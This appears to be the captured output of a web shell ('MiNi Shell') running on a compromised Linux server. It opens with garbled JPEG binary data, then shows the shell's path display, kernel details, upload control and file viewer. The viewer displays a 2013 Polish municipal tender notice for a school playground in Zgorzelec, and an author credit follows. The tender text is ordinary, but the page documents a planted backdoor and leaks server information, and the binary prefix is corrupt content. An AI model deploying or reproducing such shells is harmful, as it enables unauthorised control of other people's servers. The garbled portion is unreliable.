JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130712/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130712/272856-N-2013.html

<p class="kh_header"><b>Zgorzelec: Utworzenie placu zabaw przy Szkole Podstawowej Nr 3</b><br>
<b>Numer ogłoszenia: 272856 - 2013; data zamieszczenia: 12.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utworzenie placu zabaw przy Szkole Podstawowej Nr 3.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są roboty budowlane polegające na wykonaniu placu zabaw przy Szkole Podstawowej Nr 3 w Zgorzelcu, w ramach rządowego programu Radosna Szkoła. 

2.	Zakres przedmiotu zamówienia obejmuje w szczególności urządzenie placu zabaw 
i rekreacji wraz z montażem fabrycznie nowych urządzeń zabawowych, sportowych 
i pozostałego wyposażenia, wraz z wykonaniem nowych bezpiecznych nawierzchni typu EPDM. 

3.	Zakres rzeczowy robót budowlanych obejmuje:
a)	roboty ziemne, 
b)	wykonanie podbudowy z kruszywa łamanego, 
c)	wykonanie obrzeży betonowych, 
d)	wykonanie krawężników elastycznych, 
e)	wykonanie nawierzchni bezpiecznej w strefie I gr. 8 cm w kolorze pomarańczowym RAL2011 - w ilości 105,60 m2 
f)	wykonanie nawierzchni bezpiecznej w strefie II gr. 4 cm w kolorze pomarańczowym RAL2011 - w ilości 45, 20m2 , 
g)	wykonanie nawierzchni bezpiecznej na ciągach komunikacyjnych gr. 3 cm w kolorze ciemnoniebieskim  RAL5003 -w ilości 22,60 m2 , 
h)	wykonanie trawników w ilości ok. 180,00 m2,
i)	wykonanie podejścia do placu zabaw z kostki betonowej 63,00 m2 , 
j)	montaż urządzeń zabawowych.




4.  Plac zabaw należy wyposażyć w następujące urządzenia:
a) zestaw rekreacyjny czterowieżowy - 1 szt., 
b) huśtawkę wahadłową podwójną  -  1 szt., 
c) urządzenie ruchome typu młynek - 1 szt.,
d) ławki stalowe bez oparcia z listwami drewnianymi - 4 szt., 
e) kosze parkowe - 4 szt., 
f) tablicę informacyjną - 1 szt.

5. Parametry techniczne, wymagania dot. konstrukcji i materiału urządzeń zabawowych,  zostały zawarte w Specyfikacji Technicznej Wykonania i Odbioru Robót. 

6. Montaż urządzeń zabawowych nastąpi w wyznaczonych miejscach, zgodnie 
z dokumentacją projektowa, o której mowa w  pkt. 9, z zachowaniem stref bezpieczeństwa.

7. Nawierzchnię należy wykonać z płyt elastycznych, układanych na podłożu
z zagęszczonego kruszywa, z atestem na bezpieczną strefę upadku do 2,40m - strefa I; 1,20 m dla strefy II i 0,90 m dla ciągów komunikacyjnych w testach zgodnych z PN-EN 1177. 

8. Zamawiający wymaga zainstalowania na terenie szkolnego placu zabaw tablicy informacyjnej zawierającej regulamin określający zasady i warunki korzystania z placu zabaw oraz napis 
o treści Szkolny plac zabaw wyposażony w ramach programu rządowego RADOSNA SZKOŁA. 

9.  Szczegółowy opis przedmiotu zamówienia został zawarty w  dokumentacji projektowej w skład której wchodzi:  Projekt Budowlany, Projekt Wykonawczy, Specyfikacja Techniczna Wykonania i Odbioru Robót,  wykonana przez Projektanta Mirosława Soczyńskiego - Pracownia Projektowa ATA, z siedzibą w Lubaniu przy ul. Cmentarnej 1,  stanowiące integralną część zgłoszenia robót nie wymagających pozwolenia na budowę, wydane przez Starostę Zgorzeleckiego nr BS.6743.3.566.2011.2 z dnia 07.09.2011r. -  Załącznik Nr 1 do SIWZ.

10.  Wykonawca, jako wytwórca odpadów w rozumieniu art. 3 ust. 1 pkt. 32) ustawy o odpadach ma obowiązek zagospodarowania odpadów powstałych podczas realizacji zamówienia zgodnie z Ustawą o odpadach z dnia 14.12.2012 r., (Dz. U. 2013  poz. 21 ze zm.) oraz ustawą Prawo Ochrony Środowiska z dnia 27.04.2001 r. (tj. z 2008 r. Dz. U. Nr 25, poz. 150 ze zm.). Wykonawca w terminie wskazanym w umowie przedstawi Zamawiającemu potwierdzenie zagospodarowania odpadów zgodnie z powszechnie obowiązującymi przepisami.

11. Nazwy materiałów, urządzeń lub producentów wskazanych w dokumentacji projektowej lub technicznej nie należy traktować jako narzuconych bądź sugerowanych przez Zamawiającego. Wykonawca może zaoferować urządzenia o lepszych właściwościach, parametrach i cechach określonych przez Zamawiającego, z zastrzeżeniem, że urządzenia te muszą być zgodne 
z wszelkimi wymogami normy PN-EN 1176-1 Wyposażenie placów zabaw. Ogólne wymagania bezpieczeństwa i metody badań, posiadać certyfikaty bezpieczeństwa oraz spełniać warunki określone w Rozporządzeniu Rady Ministrów z dnia 7 lipca 2009r. w sprawie form i zakresu finansowego wspierania organów prowadzących w zapewnieniu bezpiecznych warunków nauki, wychowania i opieki w klasach I-III szkół podstawowych i ogólnokształcących szkół muzycznych I stopnia (Dz. U.  Nr 110, poz. 915 z późn.zm.). 

12. Zgodnie z ustawą z dnia 30 sierpnia 2002r. o systemie oceny zgodności (t. j. z 2010r. Dz. U. Nr 138, poz. 935 z późn. zm.), każde urządzenie powinno posiadać oznakowanie potwierdzające zgodność wyrobu z zasadniczymi wymaganiami.
Zamawiający wymaga by oferowane urządzenia zabawowe posiadały tabliczki znamionowe. Tabliczka znamionowa urządzenia powinna zawierać m.in. podstawowe informacje o produkcie tj. nazwę producenta, rok produkcji oraz normy PN-EN 1176. 

13. Jeżeli w dokumentacji projektowej lub technicznej powołane są konkretne normy 
i przepisy, które spełniać mają materiały, sprzęt i inne towary oraz wykonane  i zadane roboty, będą obowiązywać postanowienia najnowszego wydania lub poprawionego wydania powołanych norm i przepisów.  

14. Materiały zastosowane przez Wykonawcę przy wykonywaniu przedmiotu zamówienia winny być:
a) nowe i nieużywane, 
b) odpowiadać wymaganiom norm i przepisów wymienionych w specyfikacji technicznej wykonania i odbioru robót, 
c) mieć wymagane polskimi przepisami atesty i certyfikaty, w tym również świadectwa dopuszczenia do obrotu oraz certyfikaty bezpieczeństwa.

15. Zamawiający wymaga 36 miesięcznego okresu gwarancji i rękojmi  na wykonane roboty budowlane i zastosowane przy realizacji zamówienia materiały..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.00-1, 45.11.27.23-9, 45.11.27.10-5, 37.53.52.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca wniesie wadium w wysokości 2 500,00 zł przed upływem terminu  składania ofert, który został określony w pkt. 18 ppkt.1) SIWZ.

2.	W zależności od woli Wykonawcy wadium może być wnoszone w formach:
a)	pieniądzu (przelew na rachunek bankowy wskazany przez zamawiającego),
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art.. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r.  o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).

3.	W przypadku wnoszenia wadium w formach, o których mowa w pkt. 2 lit. od b) do e) oryginał gwarancji/poręczenia należy umieścić w ofercie w sposób umożliwiający jego zwrot zgodnie 
z zapisami ustawy Prawo zamówień publicznych.

4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego Nr 29 1160 2202 0000 0002 2290 9774,    z zaznaczeniem Wadium do postępowania nr WZP.271.46.2013 / kopię przelewu (wpłaty) proszę dołączyć do oferty/.             
  Skuteczne wniesienie wadium następuje w chwili uznania (zaksięgowania) kwoty wadium na rachunku bankowym Zamawiającego, co oznacza, iż wadium musi znaleźć się na rachunku Zamawiającego najpóźniej do dnia oraz godziny wyznaczonych jako termin składania ofert.

5.	Wykonawca, którego oferta nie będzie zabezpieczona akceptowalną formą wadium zostanie wykluczony z postępowania o udzielenie zamówienia, a jego oferta zostanie uznana za odrzuconą zgodnie z art. 24 ust. 2 pkt 4 ustawy Prawo zamówień publicznych.

6.	Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza,   z zastrzeżeniem pkt. 7.

7.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.

8.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami  wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.

9.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.

10.	W przypadku wniesienia wadium w formach  wymienionych w pkt.  2 lit. od b do e z treści dokumentu musi jednoznacznie wynikać, iż wypłata Zamawiającemu sumy gwarancyjnej nastąpi także w przypadku określonym w pkt.  7. 

11.	Wadium wniesione przez jednego z  Wykonawców, o których mowa w pkt. 8 SIWZ uważa się za wniesione prawidłowo.

12.	Zamawiający wymaga, aby niepieniężne formy zapłaty wadium miały charakter nieodwołalny i bezwarunkowy - równoważny pieniądzu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt. III.4.1 ogłoszenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie uznany za spełniony, jeżeli Wykonawca udokumentuje wykonanie, tj. zakończenie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy - w tym okresie: 
2-ch robót budowlanych polegających na budowie lub modernizacji placów zabaw wraz 
z wyposażeniem w urządzenia zabawowe o łącznej ich powierzchni min. 150 m2 , wraz z podaniem daty i miejsca wykonania oraz załączeniem dowodów, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. (formularz Nr 3 do SIWZ)

Ocena spełnienia w/w warunku zostanie dokonana zgodnie z formułą spełnia/nie spełnia, na podstawie załączonych przez Wykonawcę do oferty dokumentów i oświadczeń, o których mowa 
w pkt. 10 SIWZ. Nie wykazanie w wystarczający sposób potwierdzenia spełniania warunków udziału w postępowaniu oraz potwierdzenia braku podstaw do wykluczenia spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności określonej w art. 26 ust. 3 ustawy Prawo zamówień publicznych - wezwania do uzupełnienia dokumentów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt. III.4.1 ogłoszenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował:
a)	 kierownikiem robót, posiadającym uprawnienia budowlane w specjalności konstrukcyjno-budowlanej, wraz z informacją o podstawie do dysponowania tą osobą (należy podać podstawę do dysponowania tą osobą, np. umowa o pracę, umowa zlecenie, umowa o dzieło, itp.) - Wykonawca złoży oświadczenie o dysponowaniu bądź poleganiu na zasobach innych podmiotów w tym zakresie - formularz Nr 4 do SIWZ.
Zamawiający dopuszcza także odpowiadające im uprawnienia wydane obywatelom państw członkowskich Unii Europejskiej, w zakresie którego właściwy organ wydaje decyzję w sprawie uznania kwalifikacji zawodowych na zasadach określonych w ustawie z dnia 18 marca 2008 r. 
o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. Nr 63, poz. 394).

b)	 złoży oświadczenie, że osoba, która będzie uczestniczyć w wykonywaniu zamówienia, posiada wymagane uprawnienia.

Ocena spełnienia ww. warunku zostanie dokonana zgodnie z formułą spełnia/nie spełnia, na podstawie załączonych przez Wykonawcę do oferty dokumentów i oświadczeń, o których mowa      w pkt. 10 SIWZ. Nie wykazanie w wystarczający sposób potwierdzenia spełniania warunków udziału w postępowaniu oraz potwierdzenia braku podstaw do wykluczenia spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności określonej w art. 26 ust. 3 ustawy Prawo zamówień publicznych - wezwania do uzupełnienia dokumentów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty Wykonawca musi dołączyć następujące dokumenty:
1)	wypełniony  formularz ofertowy - formularz Nr 1, 
2)	 pisemne zobowiązanie, o którym mowa w pkt. 9 ppkt. 3) SIWZ oraz dokument, o którym mowa w pkt. 9 ppkt. 4) SIWZ, o ile Wykonawca polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych,
3)	pełnomocnictwo w przypadku Wykonawców wspólnie ubiegających się o zamówienie, zgodnie z zapisami  pkt. 8 SIWZ
4)	wypełniony formularz oświadczenia dot. podwykonawstwa - formularz Nr  5  do SIWZ. 
W przypadku nie dołączenia do oferty powyższego formularza, bądź jego nie wypełnienia, Zamawiający uzna, że Wykonawca wykona zamówienie własnymi siłami.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um-zgorzelec.dolnyslask.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Zgorzelcu
59-900 Zgorzelec, ul. Domańskiego 7,
Wydział Zamówień Publicznych - III piętro, pok. 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.07.2013 godzina 11:00, miejsce: Punkt Obsługi Interesanta
Urząd Miasta w Zgorzelcu, 59-900 Zgorzelec, ul. Domańskiego 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com